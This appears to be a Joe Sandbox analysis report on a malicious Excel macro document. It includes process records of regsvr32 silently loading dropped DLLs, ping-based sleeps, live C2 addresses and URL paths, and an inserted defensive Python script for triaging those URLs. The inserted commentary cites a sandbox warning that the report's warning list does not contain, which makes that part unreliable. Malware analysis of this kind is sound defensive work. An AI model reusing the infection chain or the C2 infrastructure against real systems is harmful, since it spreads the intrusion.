Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
Source: Yara match | File source: app.xml, type: SAMPLE
Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696B8940 cpuid
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696B02C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting1 | Registry Run Keys / Startup Folder11 | Process Injection112 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution43 | DLL Side-Loading1 | Registry Run Keys / Startup Folder11 | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading1 | Virtualization/Sandbox Evasion11 | Security Account Manager | Security Software Discovery21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | Remote System Discovery11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery24 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

    Behavior Graph

Behavior Graph ID: 431937; Sample: Documents_13134976_13774913...; Startdate: 09/06/2021; Architecture: WINDOWS; Score: 100

Process tree and findings recovered from the behavior graph:

Start
  signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 7 other signatures
  started: EXCEL.EXE 32 45
    dns/ip: tpfcu.com 107.180.50.232, 443, 49715 AS-26496-GO-DADDY-COM-LLCUS United States; 192.168.2.1 unknown unknown
    dropped: C:\Users\user\iepfusn.dll, PE32+; C:\Users\user\AppData\...\rtdsgfe[1].dll, PE32+; C:\...\~$Documents_13134976_1377491379.xlsb, data
    signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
    started: regsvr32.exe
      started: regsvr32.exe
        started: cmd.exe 1
          dns/ip: 8.8.7.7 GOOGLEUS United States
          signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
          started: conhost.exe; PING.EXE 1
          started: regsvr32.exe 1
            dropped: C:\Users\user\AppData\Local\...\L3YD7CE.dll, PE32+
            started: cmd.exe 1
              signatures: Uses ping.exe to sleep
              started: conhost.exe; PING.EXE 1
              started: regsvr32.exe 1
                signatures: Creates an autostart registry key pointing to binary in C:\Windows
                started: cmd.exe 1
                  signatures: Uses ping.exe to sleep
                  started: regsvr32.exe; conhost.exe; PING.EXE 1
  started: regsvr32.exe
    dns/ip: 18.117.84.120, 443, 49740, 49747 MIT-GATEWAYSUS United States
    signatures: System process connects to network (likely due to code injection or exploit)
  started: regsvr32.exe


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

Source | Detection | Scanner | Label
Documents_13134976_1377491379.xlsb | 2% | ReversingLabs |

    Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll | 6% | Metadefender | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll | 6% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll | 4% | ReversingLabs | |
C:\Users\user\iepfusn.dll | 6% | Metadefender | | Browse
C:\Users\user\iepfusn.dll | 4% | ReversingLabs | |

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://18.117.84.120/18.188.86.8/ | 0% | Avira URL Cloud | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://18.117.84.120/# | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://18.188.86.8/kenichi/special21new/trailer2a5 | 0% | Avira URL Cloud | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://18.117.84.120/ | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://18.117.84.120/kenichi/special21new/trailer2a5T0 | 0% | Avira URL Cloud | safe
https://18.117.84.120/89b | 0% | Avira URL Cloud | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://18.188.86.8/Z | 0% | Avira URL Cloud | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://18.117.84.120/kenichi/special21new/trailer2a5 | 0% | Avira URL Cloud | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://18.188.86.8:443/kenichi/special21new/trailer2a55 | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe

    Domains and IPs

    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tpfcu.com | 107.180.50.232 | true | false | | unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
        high
        https://login.microsoftonline.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
          high
          https://shell.suite.office.com:14432CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
              high
              https://autodiscover-s.outlook.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                  high
                  https://cdn.entity.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        high
                        https://powerlift.acompli.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v12CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                          high
                          https://cortana.ai2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    high
                                    https://18.117.84.120/18.188.86.8/regsvr32.exe, 00000019.00000002.636067995.00000000029E5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.aadrm.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://18.117.84.120/#regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                          high
                                          https://cr.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControl2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/Office2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                high
                                                https://graph.ppe.windows.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplate2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://18.188.86.8/kenichi/special21new/trailer2a5regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://18.117.84.120/regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                high
                                                                https://graph.windows.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
URL | Source | Malicious | Antivirus Detection | Reputation
https://officesetup.getmicrosoftkey.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://analysis.windows.net/powerbi/api | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://prod-global-autodetect.acompli.net/autodetect | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://ncus.contentsync. | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://18.117.84.120/kenichi/special21new/trailer2a5T0 | regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://18.117.84.120/89b | regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
http://weather.service.msn.com/data.aspx | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://apis.live.net/v5.0/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://management.azure.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://18.188.86.8/Z | regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://wus2.contentsync. | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://incidents.diagnostics.office.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/ios | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://18.117.84.120/kenichi/special21new/trailer2a5 | regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://insertmedia.bing.office.net/odc/insertmedia | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://o365auditrealtimeingestion.manage.office.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://outlook.office365.com/api/v1.0/me/Activities | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://api.office.net | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://incidents.diagnosticssdf.office.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://asgsmsproxyapi.azurewebsites.net/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://entitlement.diagnostics.office.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://outlook.office.com/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://storage.live.com/clientlogs/uploadlocation | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://templatelogging.office.com/client/log | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://outlook.office365.com/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://webshell.suite.office.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://18.188.86.8:443/kenichi/special21new/trailer2a55 | regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://management.azure.com/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://login.windows.net/common/oauth2/authorize | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://graph.windows.net/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://api.powerbi.com/beta/myorg/imports | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://devnull.onenote.com | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://ncus.pagecontentsync. | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://messaging.office.com/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://augloop.office.com/v2 | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | - | high
https://skyapi.live.net/Activity/ | 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | false | URL Reputation: safe (x3) | unknown

                                                                                                                                              Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
8.8.7.7 | unknown | United States (US) | 15169 | GOOGLE | false
107.180.50.232 | tpfcu.com | United States (US) | 26496 | AS-26496-GO-DADDY-COM-LLC | false
18.117.84.120 | unknown | United States (US) | 3 | MIT-GATEWAYS | true

Private

IP
192.168.2.1
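The per-URL verdicts in the table above ("Malicious: false", "Avira URL Cloud: safe") are single-row reputation lookups and carry no context. The rows that matter for this sample are the IP-literal HTTPS URLs carved out of regsvr32.exe memory dumps (the .sdmp sources), not the Office telemetry endpoints that come from the dropped 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr file. The script below is an added example and is not part of the Joe Sandbox report: it takes a constructed subset of this report's URL rows and its contacted-IP table, keeps only IP-literal URLs whose source is a process memory dump, groups them by host, links hosts that share a path directory, and cross-checks each host against the contacted-IP table. On this data it shows that 18.117.84.120 was both carved from memory and contacted (and flagged malicious), while 18.188.86.8 carries the same /kenichi/special21new/ path but is absent from the contacted-IP table. With "TCP Packets have been reduced to 100" in the warnings, that absence means no recorded connection, not proof the host was never used. The tuple and dict layouts are this example's own, not a Joe Sandbox export format.

```python
"""Triage sandbox URL rows: isolate IP-literal URLs carved from process memory
and cross-reference them with the contacted-IP table.
Added example, not part of the Joe Sandbox report; the row layouts are this
example's own assumption, not a Joe Sandbox export format."""
import ipaddress
from urllib.parse import urlsplit

# Constructed subset of the report's URL table: (url, source, malicious_flag).
SAMPLE_URL_ROWS = [
    ("https://outlook.office365.com/autodiscover/autodiscover.json",
     "2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr", False),
    ("https://management.azure.com",
     "2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr", False),
    ("https://asgsmsproxyapi.azurewebsites.net/",
     "2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr", False),
    ("https://18.117.84.120/kenichi/special21new/trailer2a5",
     "regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, "
     "regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmp", False),
    ("https://18.117.84.120/89b",
     "regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp", False),
    ("https://18.188.86.8/Z",
     "regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp", False),
    ("https://18.188.86.8:443/kenichi/special21new/trailer2a55",
     "regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmp", False),
]

# Constructed from the report's "Contacted IPs" table: ip -> flagged malicious.
SAMPLE_CONTACTED_IPS = {"8.8.7.7": False, "107.180.50.232": False, "18.117.84.120": True}


def host_is_ip_literal(url):
    """True when the URL's host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
    except ValueError:
        return False
    return True


def source_processes(source):
    """'regsvr32.exe, <dump>, regsvr32.exe, <dump>' -> {'regsvr32.exe'}; '.dr' rows -> set()."""
    parts = [p.strip() for p in source.split(",")]
    return {p for p in parts if p.lower().endswith(".exe")}


def triage(rows=SAMPLE_URL_ROWS, contacted=SAMPLE_CONTACTED_IPS):
    """Group IP-literal URLs that came from process memory (.sdmp) by host.
    The per-row 'malicious' flag is deliberately ignored: it is a reputation
    lookup on an address the AV clouds have never seen, not evidence of benignity."""
    findings = {}
    for url, source, _flag in rows:
        if ".sdmp" not in source or not host_is_ip_literal(url):
            continue
        parts = urlsplit(url)
        host = parts.hostname
        entry = findings.setdefault(host, {
            "processes": set(),
            "paths": [],
            "contacted": host in contacted,
            "flagged_malicious": contacted.get(host, False),
        })
        entry["processes"] |= source_processes(source)
        entry["paths"].append(parts.path)
    return findings


def hosts_by_path_dir(findings):
    """Map each path directory (everything before the last '/') to the hosts that
    used it; two IPs sharing '/kenichi/special21new' belong to one infrastructure set."""
    out = {}
    for host, f in findings.items():
        for p in f["paths"]:
            d = p.rsplit("/", 1)[0] or "/"
            out.setdefault(d, set()).add(host)
    return out


if __name__ == "__main__":
    found = triage()
    for host, f in found.items():
        print(host, sorted(f["processes"]), f["paths"],
              "contacted" if f["contacted"] else "NOT in contacted-IP table")
    for d, hosts in hosts_by_path_dir(found).items():
        print("path dir", d, "shared by", sorted(hosts))
```

One further caveat when pivoting on the contacted-IP table: the ASN shown for 18.117.84.120 (AS3, MIT-GATEWAYS) comes from the sandbox's IP database; the 18.0.0.0/8 block is no longer held entirely by MIT, so confirm the current holder with whois before building attribution on that ASN.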

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 431937
Start date: 09.06.2021
Start time: 15:20:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 4s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Documents_13134976_1377491379.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSB@28/13@1/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 88.3% (good quality ratio 83.8%)
• Quality average: 70.5%
• Quality standard deviation: 29%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
